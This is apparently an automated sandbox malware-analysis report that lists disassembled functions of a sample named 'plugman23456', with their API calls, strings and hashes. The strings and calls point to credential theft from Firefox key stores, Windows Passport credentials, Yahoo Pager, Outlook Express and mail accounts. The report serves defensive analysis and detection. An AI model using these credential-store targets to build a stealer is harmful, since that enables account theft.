                          • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                          Function 004429A4 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                          Download Yara Rule
                          APIs
                          • memcpy.MSVCRT ref: 00442A5E
                            • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcmpmemcpy
                          • String ID: BINARY$NOCASE$RTRIM$main$temp
                          • API String ID: 1784268899-4153596280
                          • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                          • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                          • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                          • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                          Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                          Download Yara Rule
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                          • memset.MSVCRT ref: 00410246
                          • memset.MSVCRT ref: 00410258
                            • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                          • memset.MSVCRT ref: 0041033F
                          • _mbscpy.MSVCRT ref: 00410364
                          • CloseHandle.KERNEL32(?), ref: 004103AE
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$_mbscpy$CloseHandleOpenProcess
                          • String ID:
                          • API String ID: 3974772901-0
                          • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                          • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                          • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                          • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                          Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                          Download Yara Rule
                          APIs
                          • wcslen.MSVCRT ref: 0044406C
                          • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                          • strlen.MSVCRT ref: 004440D1
                            • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                            • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                          • memcpy.MSVCRT ref: 004440EB
                          • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                          • String ID:
                          • API String ID: 577244452-0
                          • Opcode ID: b68bf44ff0a216cc051a87f20d5bcca37ca8fef9720e645d8a392b89cae1757c
                          • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                          • Opcode Fuzzy Hash: b68bf44ff0a216cc051a87f20d5bcca37ca8fef9720e645d8a392b89cae1757c
                          • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                          Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                          • _strcmpi.MSVCRT ref: 00404518
                          • _strcmpi.MSVCRT ref: 00404536
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _strcmpi$memcpystrlen
                          • String ID: imap$pop3$smtp
                          • API String ID: 2025310588-821077329
                          • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                          • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                          • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                          • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                          Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040C02D
                            • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                            • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                            • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                            • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                            • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                            • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                            • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                            • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                            • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                          • API String ID: 2726666094-3614832568
                          • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                          • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                          • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                          • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                          Function 00403A61 Relevance: 9.1, APIs: 6, Instructions: 57filestringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00403A88
                          • memset.MSVCRT ref: 00403AA1
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                          • strlen.MSVCRT ref: 00403AE9
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharMultiWidememset$FileWritestrlen
                          • String ID:
                          • API String ID: 1786725549-0
                          • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                          • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                          • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                          • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                          Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                          • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                          • OpenClipboard.USER32(?), ref: 0040C1B1
                          • GetLastError.KERNEL32 ref: 0040C1CA
                          • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                          • String ID:
                          • API String ID: 2014771361-0
                          • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                          • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                          • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                          • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                          Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                          Download Yara Rule
                          APIs
                          • memcmp.MSVCRT ref: 00406151
                            • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                            • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                            • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                          • memcmp.MSVCRT ref: 0040617C
                          • memcmp.MSVCRT ref: 004061A4
                          • memcpy.MSVCRT ref: 004061C1
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcmp$memcpy
                          • String ID: global-salt$password-check
                          • API String ID: 231171946-3927197501
                          • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                          • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                          • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                          • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                          Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 729e63cf5715f59118fe9d1a7c2076f24b1191d02e23bde904ada99bcc76db32
                          • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                          • Opcode Fuzzy Hash: 729e63cf5715f59118fe9d1a7c2076f24b1191d02e23bde904ada99bcc76db32
                          • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                          Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          • GetClientRect.USER32(?,?), ref: 004016A3
                          • GetSystemMetrics.USER32(00000015), ref: 004016B1
                          • GetSystemMetrics.USER32(00000014), ref: 004016BD
                          • BeginPaint.USER32(?,?), ref: 004016D7
                          • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                          • EndPaint.USER32(?,?), ref: 004016F3
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                          • String ID:
                          • API String ID: 19018683-0
                          • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                          • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                          • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                          • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                          Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040644F
                          • memcpy.MSVCRT ref: 00406462
                          • memcpy.MSVCRT ref: 00406475
                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                            • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                            • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                          • memcpy.MSVCRT ref: 004064B9
                          • memcpy.MSVCRT ref: 004064CC
                          • memcpy.MSVCRT ref: 004064F9
                          • memcpy.MSVCRT ref: 0040650E
                            • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID:
                          • API String ID: 438689982-0
                          • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                          • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                          • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                          • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                          Function 0044493E Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0044495F
                          • memset.MSVCRT ref: 00444978
                          • memset.MSVCRT ref: 0044498C
                            • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                          • strlen.MSVCRT ref: 004449A8
                          • memcpy.MSVCRT ref: 004449CD
                          • memcpy.MSVCRT ref: 004449E3
                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                            • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                          • memcpy.MSVCRT ref: 00444A23
                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpymemset$strlen
                          • String ID:
                          • API String ID: 2142929671-0
                          • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                          • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                          • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                          • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                          Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                            • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                            • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                          • strlen.MSVCRT ref: 0040F7BE
                          • _mbscpy.MSVCRT ref: 0040F7CF
                          • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                          • String ID: Passport.Net\*
                          • API String ID: 2329438634-3671122194
                          • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                          • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                          • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                          • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                          Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                          • memset.MSVCRT ref: 0040330B
                          • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                          • strchr.MSVCRT ref: 0040335A
                            • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                          • strlen.MSVCRT ref: 0040339C
                            • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                          • String ID: Personalities
                          • API String ID: 2103853322-4287407858
                          • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                          • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                          • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                          • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                          Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00444573
                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                            • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValuememset
                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                          • API String ID: 1830152886-1703613266
                          • Opcode ID: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                          • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                          • Opcode Fuzzy Hash: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                          • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                          Function 004309ED Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 238COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • unknown column "%s" in foreign key definition, xrefs: 00430C59
                          • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                          • API String ID: 3510742995-272990098
                          • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                          • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                          • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                          • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                          Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: H
                          • API String ID: 2221118986-2852464175
                          • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                          • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                          • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                          • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                          Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                          • API String ID: 3510742995-3170954634
                          • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                          • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                          • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                          • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                          Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: winWrite1$winWrite2
                          • API String ID: 438689982-3457389245
                          • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                          • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                          • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                          • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                          Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: winRead
                          • API String ID: 1297977491-2759563040
                          • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                          • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                          • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                          • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                          Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: gj
                          • API String ID: 1297977491-4203073231
                          • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                          • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                          • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                          • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                          Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32(?), ref: 004090C2
                          • GetWindowRect.USER32(?,?), ref: 004090CF
                          • GetClientRect.USER32(00000000,?), ref: 004090DA
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Window$Rect$ClientParentPoints
                          • String ID:
                          • API String ID: 4247780290-0
                          • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
